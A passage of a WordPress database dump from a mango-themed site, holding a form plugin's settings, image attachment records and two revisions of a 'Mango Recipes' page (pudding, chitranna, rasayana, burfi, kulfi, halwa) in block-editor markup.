0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\",\"enabled\":true}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"86ba124f0b0799b8e65b9f74726d295b\",\"seo\":{\"contest\":{\"description\":\"\"}}}','A','','inherit','closed','closed','','787-revision-v1','','','2022-02-08 14:17:40','2022-02-08 08:47:40','',787,'https://mangomitra.in/?p=852',0,'revision','',0),(857,1,'2022-02-08 15:03:18','2022-02-08 09:33:18','','IMG_5808 - Copy','','inherit','open','closed','','img_5808-copy','','','2022-02-08 15:03:18','2022-02-08 09:33:18','',745,'https://mangomitra.in/wp-content/uploads/2022/02/IMG_5808-Copy.jpg',0,'attachment','image/jpeg',0),(859,1,'2022-02-08 15:04:08','2022-02-08 09:34:08','','IMG_5808-Copy-1','','inherit','open','closed','','img_5808-copy-1','','','2022-02-08 15:04:08','2022-02-08 09:34:08','',745,'https://mangomitra.in/wp-content/uploads/2022/02/IMG_5808-Copy-1.jpg',0,'attachment','image/jpeg',0),(860,1,'2022-02-08 15:04:53','2022-02-08 09:34:53','','IMG_5808-Copy-1','','inherit','open','closed','','img_5808-copy-1-2','','','2022-02-08 15:04:53','2022-02-08 09:34:53','',0,'https://mangomitra.in/wp-content/uploads/2022/02/IMG_5808-Copy-1-edited.jpg',0,'attachment','image/jpeg',0),(861,1,'2022-02-08 15:05:48','2022-02-08 09:35:48','','Mango-Rasayana_finalforweb3-500x500-1','','inherit','open','closed','','mango-rasayana_finalforweb3-500x500-1','','','2022-02-08 15:05:48','2022-02-08 09:35:48','',745,'https://mangomitra.in/wp-content/uploads/2022/02/Mango-Rasayana_finalforweb3-500x500-1.jpg',0,'attachment','image/jpeg',0),(862,1,'2022-02-08 15:06:51','2022-02-08 09:36:51','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":828,\"width\":236,\"height\":133,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/252-2529007_pudding-jelly-hd-png-download-1.png\" alt=\"\" class=\"wp-image-828\" width=\"236\" height=\"133\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 4 hours<br>Cook Time :15 minutes<br>Total Time : 4 hours 15 minutes<br>Servings : 3 Servings</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 tsp agar-agar / gelatin / china grass<br>2 tsp hot water<br>2 cups mango puree<br>for cream layer:<br>1 cup milk full cream<br>1 tsp agar-agar / gelatin<br>½ cup sugar powdered<br>1 cup cream<br>1 tsp vanilla extract / vanilla essence<br>pinch of salt</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water.   Mix well and dissolve agar-agar completely.<br>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.<br>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.<br>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.<br>Now prepare cream layer by heating up milk.<br>Add in 1 tablespoon agar-agar / gelatin and whisk well.<br>Cook the milk on medium-low heat till it steams (do not boil).<br>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.<br>Let the milk cool for 10 minutes before pouring to the glass.<br>Pour the milk into glass.<br>Refrigerate it for 2 hours or overnight, till it sets completely.<br>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":860,\"width\":225,\"height\":141,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/IMG_5808-Copy-1-edited.jpg\" alt=\"\" class=\"wp-image-860\" width=\"225\" height=\"141\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":861,\"width\":166,\"height\":166,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Mango-Rasayana_finalforweb3-500x500-1.jpg\" alt=\"\" class=\"wp-image-861\" width=\"166\" height=\"166\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-rasayana\">Cut the mangoes into small cubes and keep them in a mixing bowl.<br>Squeeze and extract the remaining mango juice from the mangoes.<br>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.<br>Serve chilled with dosa, poori, or chapati.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time : 15 minutes<br>Total Time : 20 minutes<br>Servings : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 cup mango cubes<br>½ cup milk<br>1 cup sugar<br>3 cup coconut grated<br>¼ tablespoon cardamom powder</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a blender take 1 cup mango and ½ cup milk.<br>Blend to smooth puree adding more milk if required.<br>Transfer the mango puree to large kadai.<br>Also add 1 cup sugar and mix until sugar dissolves completley.<br>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.<br>Now add ¼ tablespoon cardamom powder and mix well.<br>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.<br>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-kulfi-recipe\">Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)<br>½ tin sweetened condensed milk(milkmaid)<br>200 ml whipping cream or 250 ml cream(chilled)<br>1/4 tablespoon elaichi (cardamom powder)<br>1 pinch kesar (saffron) (optional for color)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>Wash and peel mango. Chop them to cubes and add to a blender jar.<br>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>Blend on a medium speed until smooth.<br>Add chopped pistas. Give a good stir.<br>Pour the mixture to the kulfi moulds and refrigerate until set.<br>Rub the moulds in between your palm or dip them in a bowl of water.<br>Gently loosen and remove mango kulfi.<br>Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time :15 Mins<br>Cook Time :45 Mints<br>Makes :4-5 Perfect Squares &amp; Some Small Pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>2 and 3/4 cups Mango Pulp<br>1 tablespoon Ghee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.<br>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.<br>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.<br>Left the plate undisturbed for one more hour and then cut it into pieces.<br>Garnish it with nuts of your choice.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-08 15:06:51','2022-02-08 09:36:51','',745,'https://mangomitra.in/?p=862',0,'revision','',0),(864,1,'2022-02-08 15:13:50','2022-02-08 09:43:50','','mangoseehikarne2','','inherit','open','closed','','mangoseehikarne2','','','2022-02-08 15:13:50','2022-02-08 09:43:50','',745,'https://mangomitra.in/wp-content/uploads/2022/02/mangoseehikarne2.jpg',0,'attachment','image/jpeg',0),(865,1,'2022-02-08 15:14:43','2022-02-08 09:44:43','','download','','inherit','open','closed','','download','','','2022-02-08 15:14:43','2022-02-08 09:44:43','',745,'https://mangomitra.in/wp-content/uploads/2022/02/download.jfif',0,'attachment','image/jpeg',0),(866,1,'2022-02-08 15:15:05','2022-02-08 09:45:05','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":828,\"width\":236,\"height\":133,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/252-2529007_pudding-jelly-hd-png-download-1.png\" alt=\"\" class=\"wp-image-828\" width=\"236\" height=\"133\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 4 hours<br>Cook Time :15 minutes<br>Total Time : 4 hours 15 minutes<br>Servings : 3 Servings</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 tsp agar-agar / gelatin / china grass<br>2 tsp hot water<br>2 cups mango puree<br>for cream layer:<br>1 cup milk full cream<br>1 tsp agar-agar / gelatin<br>½ cup sugar powdered<br>1 cup cream<br>1 tsp vanilla extract / vanilla essence<br>pinch of salt</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water.   Mix well and dissolve agar-agar completely.<br>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.<br>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.<br>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.<br>Now prepare cream layer by heating up milk.<br>Add in 1 tablespoon agar-agar / gelatin and whisk well.<br>Cook the milk on medium-low heat till it steams (do not boil).<br>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.<br>Let the milk cool for 10 minutes before pouring to the glass.<br>Pour the milk into glass.<br>Refrigerate it for 2 hours or overnight, till it sets completely.<br>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":860,\"width\":225,\"height\":141,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/IMG_5808-Copy-1-edited.jpg\" alt=\"\" class=\"wp-image-860\" width=\"225\" height=\"141\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":861,\"width\":166,\"height\":166,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/Mango-Rasayana_finalforweb3-500x500-1.jpg\" alt=\"\" class=\"wp-image-861\" width=\"166\" height=\"166\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-rasayana\">Cut the mangoes into small cubes and keep them in a mixing bowl.<br>Squeeze and extract the remaining mango juice from the mangoes.<br>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.<br>Serve chilled with dosa, poori, or chapati.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":864,\"width\":213,\"height\":142,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/mangoseehikarne2-1024x682.jpg\" alt=\"\" class=\"wp-image-864\" width=\"213\" height=\"142\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:image {\"id\":865,\"width\":233,\"height\":233,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/02/download.jfif\" alt=\"\" class=\"wp-image-865\" width=\"233\" height=\"233\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time : 15 minutes<br>Total Time : 20 minutes<br>Servings : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 cup mango cubes<br>½ cup milk<br>1 cup sugar<br>3 cup coconut grated<br>¼ tablespoon cardamom powder</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Firstly, in a blender take 1 cup mango and ½ cup milk.<br>Blend to smooth puree adding more milk if required.<br>Transfer the mango puree to large kadai.<br>Also add 1 cup sugar and mix until sugar dissolves completley.<br>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.<br>Now add ¼ tablespoon cardamom powder and mix well.<br>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.<br>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p id=\"mango-kulfi-recipe\">Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)<br>½ tin sweetened condensed milk(milkmaid)<br>200 ml whipping cream or 250 ml cream(chilled)<br>1/4 tablespoon elaichi (cardamom powder)<br>1 pinch kesar (saffron) (optional for color)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Soak kesar or saffron in 2 tablespoon hot water. This is optional.<br>Wash and peel mango. Chop them to cubes and add to a blender jar.<br>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.<br>Blend on a medium speed until smooth.<br>Add chopped pistas. Give a good stir.<br>Pour the mixture to the kulfi moulds and refrigerate until set.<br>Rub the moulds in between your palm or dip them in a bowl of water.<br>Gently loosen and remove mango kulfi.<br>Garnish with crushed pista. Serve with love.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time :15 Mins<br>Cook Time :45 Mints<br>Makes :4-5 Perfect Squares &amp; Some Small Pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>2 and 3/4 cups Mango Pulp<br>1 tablespoon Ghee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.<br>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.<br>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.<br>Left the plate undisturbed for one more hour and then cut it into pieces.<br>Garnish it with nuts of your choice.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-08 15:15:05','2022-02-08 09:45:05','',745,'https://mangomitra.in/?p=866',0,'revision','',0),(867,1,'2022-02-08 15:19:58','2022-02-08 09:49:58','','download-1','','inherit','open','closed','','download-1','','','2022-02-08 15:19:58','2022-02-08 09:49:58','',745,'https://mangomitra.in/wp-content/uploads/2022/02/download-1.jfif',0,'attachment','image/jpeg',0),(869,1,'2022-02-08 15:20:39','2022-02-08 